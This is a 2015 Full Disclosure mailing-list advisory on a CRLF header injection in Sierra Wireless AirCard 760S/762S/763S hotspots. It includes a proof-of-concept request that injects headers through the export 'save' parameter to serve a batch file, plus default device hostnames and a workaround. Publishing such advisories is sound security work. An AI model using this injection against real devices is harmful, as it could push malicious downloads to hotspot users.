Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

From: Luke Walker <luke () blackduck nu>
Date: Wed, 14 Jan 2015 11:38:56 +1100
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

[*] Overview

Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.

The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.

[*] Description

The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered.

http://​<routerURL>/export.cfg?save=export.cfg


[*] Traffic sample from POC

(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)


GET /export.cfg?save=
export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a
&sessionId=00000001%2DhYL4H
4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1

User-Agent: curl/7.40.0
Host: router.4g
Accept: */*


< HTTP/1.1 200 OK
< Server: httpd/2.7 (sierra; D4C)
< Date: Mon, 12 Jan 2015 05:32:38 GMT
< Connection: keep-alive
< Cache-Control: no-cache
< Content-Disposition: attachment; filename=export.bat
< Content-type: application/bat

pause




Content-type: application/octet-stream
Transfer-encoding: chunked
3a
#
# Configuration export from Telstra WI-FI 4G
#
# Model:



[*] Limitations

While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.

However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:

* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g

[*] Workaround

Change the name and IP address of the device to something other than the
default settings.

[*] Vendor Contact

An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.

​regards
,
Luke

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: